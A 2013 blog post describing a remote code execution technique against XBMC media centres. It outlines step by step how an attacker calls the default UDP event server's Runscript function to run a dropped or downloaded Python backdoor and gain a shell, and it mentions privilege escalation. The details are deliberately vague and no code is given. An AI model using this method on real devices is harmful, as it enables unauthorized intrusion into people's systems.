Thursday, April 25, 2013

how to abuse xbmc

As we mentioned in the previous post, we spent some time this past weekend playing around with XBMC as it is gaining in popularity and because we use it often as well.

Quick note before we get going - we're not trying to feed script kiddies. There are no videos, and the details are somewhat vague... on purpose.

We found a neat little hack to execute arbitrary code on (specifically tested) xbmcbuntu, raspbmc, and ubuntu with xbmc installed. This probably works in similarly crafty ways on the windows side and other platforms but we just can be bothered to verify. This attack isn't crazy complex or sup3r1337z; rather a (we like to think) clever abuse of functionality.

The heart of this attack relies on the fact that xbmc.runscript allows you to run any python script on the victim box that is accessible to the user xbmc is running as.

Lets cover off getting a shell on xbmcbuntu and raspbmc. This ones less cool because it relies on SMB.

Pre-requisites:
  • The event server is running.
    • This is on by default on (we're pretty sure) all XBMC deployments.
    • event server is on udp port 9777
  • SMB is enabled without a password
    • By default xbmcbuntu and raspbmc both ship with SMB enabled with no password.
The attack is pretty straightforward:
  1. create a python script that downloads a file and executes it... maybe a backdoor?
  2. upload this python script to the victim using SMB
  3. invoke the event server on the victim's xbmc from a remote machine calling Runscript with the file you dropped
  4. Boom.
We spent some extra time playing with a default ubuntu install updated to the current date with xbmc installed. The attack landscape was a little different here as SMB isn't available out of the box, especially not without a password.

We got creative.

Pre-requisites:
  • The event server is running.
    • This is on by default on (we're pretty sure) all XBMC deployments.
    • event server is on udp port 9777
The attack:
  1. invoke the event server on the victim's xbmc from a remote machine calling Runscript with one of the python scripts that is already on the ubuntu box (by default) and can be abused to download a file. We're not going to spell it out... it's not that hard to find.
  2. this call to event server (in our tests) downloaded a python script to the victim
  3. invoke the event server on the victim's xbmc from a remote machine calling Runscript with the python script you downloaded previously.
  4. Boom.
We also found a way to list directory contents using a JSON RPC over HTTP request. Also a way to pull files from xbmc on ubuntu. We'll write these up in another blog post.

All these vulnerabilities give you privileges as whatever the user who ran xbmc was. Usually a regular user... but once you get a shell you can look at local vulns to elevate privilege.

Note: we posted this a while back but pulled it back in to draft as we wanted too formalize with a POC, but wont be releasing a formal write up as in the time that we were lazy others already have.